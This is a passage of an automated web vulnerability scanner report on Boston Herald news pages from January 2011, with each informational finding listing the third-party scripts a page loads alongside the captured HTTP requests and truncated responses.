Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.681. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.682. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.683. http://www.bostonherald.com/news/politics/view/20110128proposal_to_shrink_drug-free_school_zone_draws_ire/srvc=home&position=recent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128proposal_to_shrink_drug-free_school_zone_draws_ire/srvc=home&position=recent

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20110128proposal_to_shrink_drug-free_school_zone_draws_ire/srvc=home&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.684. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:21:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.685. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=rcHW801DO8kADVvc; bhpopup=on; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.2.10.1296251844; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __utmb=1.1.10.1296251844; __qca=P0-1247593866-1296251843767

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.686. http://www.bostonherald.com/news/politics/view/20110128tweets_on_beacon_hill_okd_as_critics_grouse/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128tweets_on_beacon_hill_okd_as_critics_grouse/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /news/politics/view/20110128tweets_on_beacon_hill_okd_as_critics_grouse/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.687. http://www.bostonherald.com/news/regional/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/regional/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.688. http://www.bostonherald.com/news/regional/gardner_heist/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/gardner_heist/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /news/regional/gardner_heist/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
